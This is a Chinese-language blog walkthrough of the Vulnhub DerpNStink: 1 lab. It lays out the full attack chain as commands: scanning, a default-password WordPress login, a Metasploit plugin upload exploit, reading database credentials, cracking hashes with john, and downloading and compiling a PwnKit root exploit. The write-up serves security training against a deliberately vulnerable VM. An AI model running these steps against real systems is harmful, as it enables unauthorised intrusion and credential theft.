Vulnhub靶机:DerpNStink: 1

最新推荐文章于 2024-10-18 12:25:02 发布
最新推荐文章于 2024-10-18 12:25:02 发布
阅读量1.2k 收藏 17
点赞数 29
分类专栏: Vulnhub靶机 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57289348/article/details/142601506
版权

0x01 项目地址

DerpNStink: 1

0x02 靶机描述

Your goal is to remotely attack the VM and find all 4 flags eventually leading you to full root access. Don't forget to #tryharder

您的目标是远程攻击虚拟机并找到所有 4 个 flag ,最终让您获得完全 root 访问权限。别忘了 #更加努力

0x03 环境搭建

靶机

DerpNStink: 1

NAT模式 192.168.6.168

攻击机

kali

NAT模式 192.168.6.128

0x04 详细步骤

1.主机发现

nmap -sP 192.168.6.0/24

2.端口扫描

nmap -p- -A -sV -Pn 192.168.6.168

开放了21/22/80三个端口

3.目录扫描

dirsearch -u 192.168.6.168

4.flag1

浏览器访问192.168.6.168

随便翻了翻,Curl+U查看源码,发现第一个flag

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

5.flag2

同时在源码中发现了一个信息

点击查看内容,大概意思是说需要更新本地hosts文件才能访问博客

拼接访问刚才目录扫描扫到的目录/robots.txt,这里边两个目录依次访问没有发现有用的信息

拼接访问/php/phpmyadmin/,这是一个phpmyadmin登录界面,尝试弱口令爆破,没有爆破成功

到此在80端口没有可利用的内容了,不过既然提示了要配置本地hosts文件才能访问博客,那应该还有一个博客没有访问到,但是之前目录扫描并未扫描到,这里换种方式再次目录扫描一下

dirb http://192.168.6.168

这次扫到了

然后我们来访问一下

http://192.168.6.168/weblog/

这里发现自动跳转到了另一个地址http://derpnstink.local/weblog/

根据这个地址我们来配置一下本地hosts文件,在hosts文件中新增一条数据

192.168.6.168 derpnstink.local

再次访问http://192.168.6.168/weblog/,翻了翻也没有什么可利用的点

拼接访问/weblog/wp-admin/,又一个登录界面,尝试弱口令

admin
admin

登录成功了

因为是WordPress站点,所以我们可以使用wpscan扫描看看

wpscan --url http://derpnstink.local/weblog/

扫描到WordPress版本是4.6.29

还有一个插件slideshow-gallery

打开MSF搜索Slidehow Gallery查看是否有可利用的模块

msfconsole
search Slidehow Gallery

确认有,开始利用

use 0
show options						 #显示配置参数
set rhosts 192.168.6.168 #靶机IP
set targeturi /weblog/	 #靶机路径
set wp_user admin				 #设置账号
set wp_password admin		 #设置密码
run											 #运行

执行成功,输入shell,成功getshell

shell

利用python将shell转变为交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

然后寻找可利用的文件,在/var/www/html/weblog下的wp-config.php发现了数据库账号密码:root/mysql

cd /var/www/html/weblog
cat wp-config.php

然后在phpmyadmin那个登录页面进行登录

http://192.168.6.168/php/phpmyadmin/

wordpress数据库 -> wp_posts表中发现 flag2.txt

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

6.flag3

继续查找线索,在 wordpress数据库 -> wp_users表中发现两个账户及密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

密码是被编码过的,接下来我们来爆破一下这两个密码

先在桌面新建一个txt文件存放账号密码

cd Desktop
vim user_pass.txt

然后在/usr/share/wordlists解压字典并将其复制到桌面

cd /usr/share/wordlists
gunzip rockyou.txt.gz
cp rockyou.txt /home/kali/Desktop
cd /home/kali/Desktop

然后用john爆破密码

john --wordlist=rockyou.txt user_pass.txt

爆破成功

unclestinky:wedgie57
admin:admin

在靶机home目录下发现两个用户,mrderp/stinky

cd /home
ls

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57,成功登录,并在/stinky/Desktop目录下找到flag.txt

su stinky
password:wedgie57
ls
cd stinky
ls
cd Desktop
ls
cat flag.txt

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

7.flag4

权限提升

github中找到了对应版本的提权脚本,我们将其下载并放到kali桌面

GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

开启kalihttp服务,将脚本复制到网站根目录下

service apache2 restart
cp cve-2021-4034-poc.c  /var/www/html

利用kalihttp服务,将脚本下载到靶机,给到其执行权限,将其编译

wget http://192.168.6.128/cve-2021-4034-poc.c
chmod +x cve-2021-4034-poc.c
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

完成后执行脚本,就拿到了root权限

./cve-2021-4034-poc

最后在/root/Desktop目录下找到了最后一个flag

cd /root/Desktop
ls
cat flag.txt

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

至此四个flag以及root权限全部完成!

MoYv70
关注
专栏目录
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1244
渗透学习
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 337
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
Vulnhub靶机-DeRPnStiNK
ergeLXT的博客
06-28 1039
服务器上有wordpress,打开/weblog/目录,被重定向到 http://derpnstink.local/weblog。使用wpscan来枚举网站 http://derpnstink.local/weblog 的插件、主题和用户。查看发现不可以任意上传下载文件,只能在指定目录下上传下载文件,不可以使用udf。还有一个21端口,尝试登陆一下,使用stinky/wedgie57登陆成功。在ftp中找到ssh登陆的key,使用stinky用户登录成功。发现ssh不支持密码登陆,只可以通过指纹登陆。
Vulnhub:DerpNStink 1靶机
qq_43884092的博客
04-28 1164
wordpress后台弱口令,插件Slideshow任意文件上传
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 878
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1
Aluxian_的博客
02-02 1692
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium (中等的)1.信息收集工具得使用2.wpscan和msfconsole的使用,了解模块的利用3.curl读取源码,以及msf反弹shell到本机 (这个是新知识的需要学习)4.数据库的增删改查 以及查看的相关命令,john字典爆破5.SSH。
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 998
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
vulnhub系列:DeRPnStiNK
jq_j37的博客
08-07 709
vulnhub系列:DeRPnStiNK靶机,打靶文章
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 2106
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4280
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1986
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2539
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 417
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1241
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
软考(网工)——网络安全
最新发布
2301_80093566的博客
10-18 724
公钥密码又称为非对称加密,就是对数据加密和解密的密钥是不同的。密钥分发方便、密钥保管量少、支持数字签名。加密速度慢(计算量大,不适合加密大数据)、数据膨胀率高。公钥公开,私钥自己保存。公钥加密,私钥解密,可实现保密通信私钥加密,公钥解密,可实现数字签名常见的非对称加密算法如下:RSA:512位(或1024位)密钥,计算量极大,难破解。Elgamal、ECC(椭圆曲线算法)、背包算法、Rabin、DH等。网络攻击分类:主动和被动。
如何利用被动DNS(Passive DNS)加强网络安全
2401_84466229的博客
10-17 886
被动DNS是由Florian Weimer于2004年发明的,用于对抗恶意软件。基本上,递归名称服务器将它们从其他名称服务器接收到的响应记录下来,并将记录的数据复制到一个中央数据库。那么记录的数据会是什么样子呢?好吧,回想一下递归名称服务器的运作方式。在被查询时,它们会检查它们的缓存和权威数据以获取答案,如果答案不存在,它们会从一个根名称服务器查询并遵循引荐,直到找到知道答案的权威名称服务器,然后查询其中一个权威名称服务器以检索答案。它看起来像这样:递归名称服务器。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值